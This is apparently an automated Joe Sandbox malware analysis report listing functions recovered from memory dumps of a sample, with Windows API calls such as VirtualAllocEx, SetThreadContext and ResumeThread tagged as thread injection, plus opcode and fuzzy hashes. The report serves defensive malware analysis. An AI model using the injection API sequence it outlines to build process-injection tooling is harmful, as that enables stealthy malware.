DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0134C4FE,?,?,?,?,?), ref: 0134C5BF

Memory Dump Source

Source File: 00000000.00000002.295947413.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1340000_iuvRyl9i7D.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a199259b6ec4e97486067a6f854dc56b45e25fead16d8c7338d5e2ea0dc90891
Instruction ID: 19b1a92d5e57c45b4f19f39abab85db723bed4e338ea2d72e24dd94cbfa1fc21
Opcode Fuzzy Hash: a199259b6ec4e97486067a6f854dc56b45e25fead16d8c7338d5e2ea0dc90891
Instruction Fuzzy Hash: 2A21E6B5901208DFDB10CFAAD584ADEBBF8FB48324F14845AE914A7350D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0134C530 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0134C4FE,?,?,?,?,?), ref: 0134C5BF

Memory Dump Source

Source File: 00000000.00000002.295947413.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1340000_iuvRyl9i7D.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 04bd3d23f6711d7025d515b39d723f204edabe4cf0da3ec4ab67b46c1461b402
Instruction ID: 97952acdc4095eb3ea325ba325a5ab42c29529cc74fcaf2322859fb9b18b3ce6
Opcode Fuzzy Hash: 04bd3d23f6711d7025d515b39d723f204edabe4cf0da3ec4ab67b46c1461b402
Instruction Fuzzy Hash: DD21E3B5900218AFDB10CFAAD984BDEBBF8EB48324F14841AE914A7350D374A954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0784A0A0 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0784A120

Memory Dump Source

Source File: 00000000.00000002.302201924.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7840000_iuvRyl9i7D.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d6478d2cc74359425deadf573a2a68d529d8b12f8f18073996e6339a3275d5d7
Instruction ID: ea8fa5a2cba2ce290dae33368da3fc63b9db079c5577f14ec07610b92d1bf898
Opcode Fuzzy Hash: d6478d2cc74359425deadf573a2a68d529d8b12f8f18073996e6339a3275d5d7
Instruction Fuzzy Hash: 6B2145B1C043099FCB10DFAAC980BEEBBF5FF48314F14842AE919A7240D7789944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07849CF8 Relevance: 1.6, APIs: 1, Instructions: 63
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 07849D76

Memory Dump Source

Source File: 00000000.00000002.302201924.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7840000_iuvRyl9i7D.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 7629dc7fb5652d5c4e6d7e8426fee755651563ad798ba4962803ea13f598c91f
Instruction ID: 1858756d825faa86fe59dd67edf7ca47903b37535e85975207a44bdff0d176ff
Opcode Fuzzy Hash: 7629dc7fb5652d5c4e6d7e8426fee755651563ad798ba4962803ea13f598c91f
Instruction Fuzzy Hash: 6C213AB1D043098FCB10DFAAC5847EFBBF4AF48214F158429D519A7240D778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01349CC0 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0134A2D1,00000800,00000000,00000000), ref: 0134A4E2

Memory Dump Source

Source File: 00000000.00000002.295947413.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1340000_iuvRyl9i7D.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: def5062d90003eafc199804a4f33a93afa20d2806787ec04c68c7f6131957fb1
Instruction ID: 34bdbcece0011d9b0dcafdd186561233d2532649fca6016b604e8417683d7d69
Opcode Fuzzy Hash: def5062d90003eafc199804a4f33a93afa20d2806787ec04c68c7f6131957fb1
Instruction Fuzzy Hash: DC1117B69002099FDB10DF9AC448BDEFBF4EB88324F14842AE919B7300C375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0134A470 Relevance: 1.6, APIs: 1, Instructions: 54
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0134A2D1,00000800,00000000,00000000), ref: 0134A4E2

Memory Dump Source

Source File: 00000000.00000002.295947413.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1340000_iuvRyl9i7D.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4258b88532533637b87df1e6d69ca5be8350648c860339eeeef3299e1595e362
Instruction ID: 74353720128a00fca5a960a994287beb4b9c7629b0e106760f103616da1cc59b
Opcode Fuzzy Hash: 4258b88532533637b87df1e6d69ca5be8350648c860339eeeef3299e1595e362
Instruction Fuzzy Hash: DE11D6B69002099FDB10DF9AD448BDEBBF4AB98324F15841AD519A7300C775A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07849E90 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07849EFE

Memory Dump Source

Source File: 00000000.00000002.302201924.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7840000_iuvRyl9i7D.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7b49c5443821a75dfa7dcc528d31bf3dd9466b8792aa6d56ec225bf2e33d00d2
Instruction ID: c78508dabfc5434c3a57a0503575c9bf11a41358a1ba4faa5dde82207448c39c
Opcode Fuzzy Hash: 7b49c5443821a75dfa7dcc528d31bf3dd9466b8792aa6d56ec225bf2e33d00d2
Instruction Fuzzy Hash: 5D1167729043099FCB10DFAAC9447DFBBF5AF88328F148819E915A7250C775A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 07849C18 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 07849C7A

Memory Dump Source

Source File: 00000000.00000002.302201924.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7840000_iuvRyl9i7D.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 222eb27459a8a3d0f8105857f7ec3990ca04537c92f3d5f2f79df872720f6ff1
Instruction ID: cadff5c232152dac40c3fe690688989f778eea51b1456aa54a82fab231f73e05
Opcode Fuzzy Hash: 222eb27459a8a3d0f8105857f7ec3990ca04537c92f3d5f2f79df872720f6ff1
Instruction Fuzzy Hash: 711136B1D043498BCB20DFAAC5447EFFBF4AB88228F158829C519A7340C778A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0134A1F0 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0134A256

Memory Dump Source

Source File: 00000000.00000002.295947413.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1340000_iuvRyl9i7D.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4990e4e5ea5266df0406d0328f614f11731a07560219f1659c83e28bba998df5
Instruction ID: 59482b7402ad2a20e4af94e1c185dc7d1a5fa9432531d4773aa5ca7f539b4efb
Opcode Fuzzy Hash: 4990e4e5ea5266df0406d0328f614f11731a07560219f1659c83e28bba998df5
Instruction Fuzzy Hash: 211113B5C002598FDB10DF9AC444BDEFBF4AB88324F14851AD819B7200D375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 075D58A6 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

E, xrefs: 075D58AF

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: 4ff8d27a1c823f3b7f9a9f700ea342e47b6b45d80b7df7366c909e1fb927ac47
Instruction ID: 16fce04c0b0a0277f91e59fd277c4712ed99331e51b28df0ff08f70cad71c0a8
Opcode Fuzzy Hash: 4ff8d27a1c823f3b7f9a9f700ea342e47b6b45d80b7df7366c909e1fb927ac47
Instruction Fuzzy Hash: 1921FFB4E0025A8FCF51CFA8C4805EEBBF1BF09314F2044A9D409EB245E7389D45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 075DBC8F Relevance: 1.3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

Strings

p, xrefs: 075DBCAB

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID: p
API String ID: 0-2181537457
Opcode ID: bf36da36092bcd136dad7377b804a04bbd223caa78331063772e3a2c35712876
Instruction ID: 966d64a34a19bb795c6b402af7c59f7dd1c6506207795ed633d7d5cb36408a77
Opcode Fuzzy Hash: bf36da36092bcd136dad7377b804a04bbd223caa78331063772e3a2c35712876
Instruction Fuzzy Hash: 9701E8F4D18159CADB20DFA8D850BEDFBB2BF19300F059599D809A7202E7309980CF61

Uniqueness

Uniqueness Score: -1.00%

Function 075D5230 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aaad9804a081034359b8721d797bb8eb5b63b4b6a78c6db51b3ed79d9b579d2
Instruction ID: b52c8b512ee0adb4a78115572531440eab4793f282c0e7e7265459782e47932c
Opcode Fuzzy Hash: 8aaad9804a081034359b8721d797bb8eb5b63b4b6a78c6db51b3ed79d9b579d2
Instruction Fuzzy Hash: 43B123B17142118FCB399B3C8459ABE3BE3BFC5254B1944AAE006CB3A1EF74CC418792

Uniqueness

Uniqueness Score: -1.00%

Function 075D1000 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64f456386732120fcf04e7daf7336f5920355f828c60d4dd3b5c44cb788e930c
Instruction ID: ee708c80344075753dc39f7ede180c56e421e37a66d31f1303cbd8ecab4c717d
Opcode Fuzzy Hash: 64f456386732120fcf04e7daf7336f5920355f828c60d4dd3b5c44cb788e930c
Instruction Fuzzy Hash: 05B18D70B116198FCB24DFA8D949AAE7BF2BF88344F158029E506EB395DB31DC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 075D7450 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a67f24b54b72fb54ce7f2cc3044682f195c7b8f69bdf4ba6897b7c364bd540
Instruction ID: c94b828830c3008ace51e8ecd0f346f2b542e837d62923774f5ad7a071436d30
Opcode Fuzzy Hash: 42a67f24b54b72fb54ce7f2cc3044682f195c7b8f69bdf4ba6897b7c364bd540
Instruction Fuzzy Hash: E68161B5A006468FCB24CFACC4889E9BBB1FF8D314B15896AD405DB7A5E731DC41CB92

Uniqueness

Uniqueness Score: -1.00%

Function 075D6958 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd989eb40f0174abde41f413c911550eb8c23d89e386e44be8e1de42c5a1e9f4
Instruction ID: 00cb5feceea2db104b4d764c05220eecde017fdd53cb0e0b39d1971ad3c588d1
Opcode Fuzzy Hash: cd989eb40f0174abde41f413c911550eb8c23d89e386e44be8e1de42c5a1e9f4
Instruction Fuzzy Hash: 3A819C717102159FCB189F68C859BAE7BA7FB88380F058428F5069B384CF74DD42DB96

Uniqueness

Uniqueness Score: -1.00%

Function 075D9448 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e1c8a7268434c286138ae4d28bc282db191c50b4d09424a0c12f57582c40c57
Instruction ID: 1f7cac2f33cf5a9cd57988e1912d2b27a394e2decedc76d8e1d18f4ae320942a
Opcode Fuzzy Hash: 6e1c8a7268434c286138ae4d28bc282db191c50b4d09424a0c12f57582c40c57
Instruction Fuzzy Hash: E361A2B13141568FDB24DF7DD884AAA7BE9FF85650B05447AE41ACB362EB31EC01C750

Uniqueness

Uniqueness Score: -1.00%

Function 075DBE97 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 862d17da886d8a0aa6acaae93164f3049ee53ec2e9fb68f2a15fe9cab2dfa432
Instruction ID: 593b23527b83dfca5023a1775153f3f310a0b30246384a03877376c2f29121c3
Opcode Fuzzy Hash: 862d17da886d8a0aa6acaae93164f3049ee53ec2e9fb68f2a15fe9cab2dfa432
Instruction Fuzzy Hash: E771F6F4E0425A8BCB11DFACC881AEEBBB2BF49314F1A8569D509E7345E7309D418F61

Uniqueness

Uniqueness Score: -1.00%

Function 075DB5AF Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad5f311b3e69f537801a8984193261e88f00a167119b32b3e8d8b206668a03ea
Instruction ID: 3a93a957c5c7bf2bb614c96fcc5924abc88dd40044fe88d25878ded95aa02545
Opcode Fuzzy Hash: ad5f311b3e69f537801a8984193261e88f00a167119b32b3e8d8b206668a03ea
Instruction Fuzzy Hash: EC61C3B4D052598FDF21CFA8C981ADDBBB2BB49304F1585AAD509AB242E7319D81CF60

Uniqueness

Uniqueness Score: -1.00%

Function 075D5A20 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18aa8a8d53b246f5364b7fa3008832df0808a7a03fb99ca1590da2b5cf1b796b
Instruction ID: 130cb6dcdc2fbc1a0817b969830e8830242240395110bf20ee73124fe133e1f6
Opcode Fuzzy Hash: 18aa8a8d53b246f5364b7fa3008832df0808a7a03fb99ca1590da2b5cf1b796b
Instruction Fuzzy Hash: AA5191B4E15219DFDB14CFA8D881ADDBBF1BB49300F10856AE81ABB305EB34AD458F50

Uniqueness

Uniqueness Score: -1.00%

Function 075D6C50 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed1eaf040b03b712f3a4e5716632a591befd3886b2a6c4e31beb3bc124a24a94
Instruction ID: ccb43379c8cbed5fa0f1d402491e090c77a142b6b0d1d822f85c589c4912e72f
Opcode Fuzzy Hash: ed1eaf040b03b712f3a4e5716632a591befd3886b2a6c4e31beb3bc124a24a94
Instruction Fuzzy Hash: 1D41A3707042058FCB28AB7994A577E7AA3FFC9288F158429E146CB385DF74CC42D791

Uniqueness

Uniqueness Score: -1.00%

Function 075D5A30 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d66fcdbf29b9de8929ca0b36ef45b6df3d800b0f088d426efab31ca9bb5b1442
Instruction ID: f6a80d8ad4f8db35575513ee0c105a28a5010e969a250f17a4a8af664eaa96ca
Opcode Fuzzy Hash: d66fcdbf29b9de8929ca0b36ef45b6df3d800b0f088d426efab31ca9bb5b1442
Instruction Fuzzy Hash: A6517FB4E15219DFDB24CFA8D981ADDBBF5BB49300F10846AE81AB7304EB309D458F50

Uniqueness

Uniqueness Score: -1.00%

Function 075D0FF1 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3f2ca070d1dc47b3ced55f6ce44e1b56c80ffd7fc025c324a706c220e4aad5f
Instruction ID: 96d7ffddbe1db6f74709e83dcd5e44c93fd90448d2a05e169a14f3f66a90d962
Opcode Fuzzy Hash: a3f2ca070d1dc47b3ced55f6ce44e1b56c80ffd7fc025c324a706c220e4aad5f
Instruction Fuzzy Hash: 7A5127B0A1161ACFCB24DFA9E588AEDBBF1BF48745F15806AE805E7261D731DC40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 075D1A17 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a055f9c1a70be5a16e2c8c5924a1925d77ca2f132d55ec2a11b74ed06cde4517
Instruction ID: 94fd9fa46b600b7ed57a9684567a2a359fc05226cc0490edead380d7b5866780
Opcode Fuzzy Hash: a055f9c1a70be5a16e2c8c5924a1925d77ca2f132d55ec2a11b74ed06cde4517
Instruction Fuzzy Hash: 1A41577161021A9FDF249F68D885AEEBBA3BF84354F058429F80697294DB34CC52DB90

Uniqueness

Uniqueness Score: -1.00%

Function 075D9678 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d67113b88542a6bfb1b6853f4195864539e71ef02953bf7192e94786ab5dc322
Instruction ID: 9b73a40d3880b7e9969f80767451c07eb61dc38e0ed04fef9dfd81a52c8f331f
Opcode Fuzzy Hash: d67113b88542a6bfb1b6853f4195864539e71ef02953bf7192e94786ab5dc322
Instruction Fuzzy Hash: 812127B83183124FCB351A3D94911FE3AE7EFC2554718803AE806CB396DF25DC419781

Uniqueness

Uniqueness Score: -1.00%

Function 075D9688 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb183baf692b52574e605596db1907636bf96dcaf2d9ba0901cfeac2018e5b9b
Instruction ID: 80894f3496ae3f3eebbf7a881190ed2cda2d1d92213ccfd908e7ab7e68152ea7
Opcode Fuzzy Hash: bb183baf692b52574e605596db1907636bf96dcaf2d9ba0901cfeac2018e5b9b
Instruction Fuzzy Hash: F321F5B83142164BDB345A3D85906FE36DBEFC2258F24803AE807CB795DF29DC419781

Uniqueness

Uniqueness Score: -1.00%

Function 075D6008 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0968f3cbc2e22bf62c67ab4e042d296421bdd6ea440db44a1165660d0941507e
Instruction ID: 4eb954b66ad66bb2fde38d6746d3badbe31799dd41de4d747545a0e23dfdff30
Opcode Fuzzy Hash: 0968f3cbc2e22bf62c67ab4e042d296421bdd6ea440db44a1165660d0941507e
Instruction Fuzzy Hash: 4F21A4707542006BEB3C56295C56FBF2AA7EBC47E4F58C424F60ADB2C0CE74AC425259

Uniqueness

Uniqueness Score: -1.00%

Function 075D57EE Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d30bc71a42ec67eba69766e8b283e10162c79fa44965066ddba0faf202eb7086
Instruction ID: 247c512ff63bd9a1d1b0f6d6c870d72cc4c6efd656ff0d60c349c419627b3d8f
Opcode Fuzzy Hash: d30bc71a42ec67eba69766e8b283e10162c79fa44965066ddba0faf202eb7086
Instruction Fuzzy Hash: 5B31AFB4E1425A8BDB14CFE9C5805EEBBF2BB49314F24882AD506EB204E7309A55CB50

Uniqueness

Uniqueness Score: -1.00%

Function 075D5FF8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d24244fd3550567f8710b07bf7c24090c0fa8571ffdbf0cda359e4e17e12fda2
Instruction ID: f7e8baf27e90418ee0564c788602ce08bb8323c622d4cb74885b3636a85f49c4
Opcode Fuzzy Hash: d24244fd3550567f8710b07bf7c24090c0fa8571ffdbf0cda359e4e17e12fda2
Instruction Fuzzy Hash: C111E4307592005FEB2856395C66FBF2AA7EBC53A4F598024F20ADB3C1DE689C4253A5

Uniqueness

Uniqueness Score: -1.00%

Function 075D72B8 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbf6d08750a9fa3e248b1961f04496ed54b16c524fbd5f1910a9fc018a12ab11
Instruction ID: cdc6939549f76b87638ef2aae0f0e9b2370c4cdcd4a275039568c628f0809073
Opcode Fuzzy Hash: fbf6d08750a9fa3e248b1961f04496ed54b16c524fbd5f1910a9fc018a12ab11
Instruction Fuzzy Hash: 892102713006168FC7399B2ED898A6EB7A2FF8975170489B9E806DB791DF71DC018BC0

Uniqueness

Uniqueness Score: -1.00%

Function 075D5662 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69f09132399c4285b175eb05f5458b19dd70a2bea36f379f2f7e9b208a66935f
Instruction ID: 1e0591a3b0506990cb1eebe7c32c0d168e895a58e697f386b65f8e0d60d267fd
Opcode Fuzzy Hash: 69f09132399c4285b175eb05f5458b19dd70a2bea36f379f2f7e9b208a66935f
Instruction Fuzzy Hash: 8D31C4B4901258CFCB64DFB8C884ADDBBB1FF09215F1584AAD405EB321EB319985CF20

Uniqueness

Uniqueness Score: -1.00%

Function 075D72A8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8ad5570526484e55ab23f9ecaa26fb00abbcbcae6c1d939131fda018900d13
Instruction ID: 062598c69bef95459f0c32907fa2a9530dd3136f2a071a3c502c7e9eb7eecdaf
Opcode Fuzzy Hash: bd8ad5570526484e55ab23f9ecaa26fb00abbcbcae6c1d939131fda018900d13
Instruction Fuzzy Hash: ED11E2713047128FC72A9A2ED8545AE7BA2FF8976131948AAF806DB351DF71DC01C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 075D1501 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8bd585313d47d37a7b5f959beb11523d6eed5b6f6123e8fecc2088745952e51
Instruction ID: 529daae7652f23f064bf7955cb597254d6da509e928408e26ce22a05ae1ad6c8
Opcode Fuzzy Hash: f8bd585313d47d37a7b5f959beb11523d6eed5b6f6123e8fecc2088745952e51
Instruction Fuzzy Hash: F511E9F1B09B5B8BDB348B7DE4885AA7BA1BBC1210B0B856BD40687141EA35DC418B51

Uniqueness

Uniqueness Score: -1.00%

Function 075D6118 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d41d58c0fbf1bc80c70432011983e80c29310ecc32d2d7ceb42d752d8eed798
Instruction ID: 83473ec99e4e28ac8cec21903f52de08529fbdbc988e4c84ec533aee6bcbabd1
Opcode Fuzzy Hash: 0d41d58c0fbf1bc80c70432011983e80c29310ecc32d2d7ceb42d752d8eed798
Instruction Fuzzy Hash: 7C119DB160421A8FCB149F68D955BAB3BB2FF84394F008029F8058B346DB35DD16DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 075D68FE Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

